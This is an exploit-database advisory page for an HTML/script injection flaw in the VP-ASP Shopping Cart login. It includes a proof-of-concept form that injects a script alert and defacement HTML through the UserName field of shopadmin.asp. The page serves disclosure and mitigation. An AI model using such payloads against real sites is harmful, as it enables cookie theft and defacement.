header-logo
Suggest Exploit
vendor:
VP-ASP Shopping Cart
by:
ConcorDHacK
5.5
CVSS
MEDIUM
HTML Injection
79
CWE
Product Name: VP-ASP Shopping Cart
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

VP-ASP Shopping UserName HTML Injection Vulnerability

The VP-ASP Shopping Cart is vulnerable to HTML injection due to a lack of proper validation of user-supplied input. An attacker can inject arbitrary HTML and script code, which will be executed in the context of the affected website. This can lead to the theft of cookie-based authentication credentials and control over the site's rendering. Other attacks are also possible.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the injection of arbitrary HTML and script code. Additionally, the use of secure session management mechanisms can help protect against the theft of authentication credentials.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15490/info

VP-ASP Shopping Cart is prone to an HTML injection vulnerability. This is due to a lack of proper validation of user-supplied input before being used in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. 

<TITLE>VP-ASP Shopping UserName HTML Injection Vulnerability</TITLE>
<form action=http://www.example.com/shopadmin.asp name=LoginForm method=POST>
<input type=hidden name=UserName value='"><script>alert("Vulnerable server!!!
By ConcorDHacK")</script>
<b><font color="red" size="10">Vulnerable server<br>By ConcorDHacK@gmail.com>
</font> </b>' /> <input type=hidden name=Password size="20" value="123"></td>
<input type=submit name="Login" value="GO ! GO !"><br><br><br>By ConcorDHacK<br>
<u>Email</u>: ConcorDHacK@gmail.com<br>
<a href="http://hackzord-security.fr.tc">www.hackzord-security.fr.tc</a>
</form>
</body>
</HTML>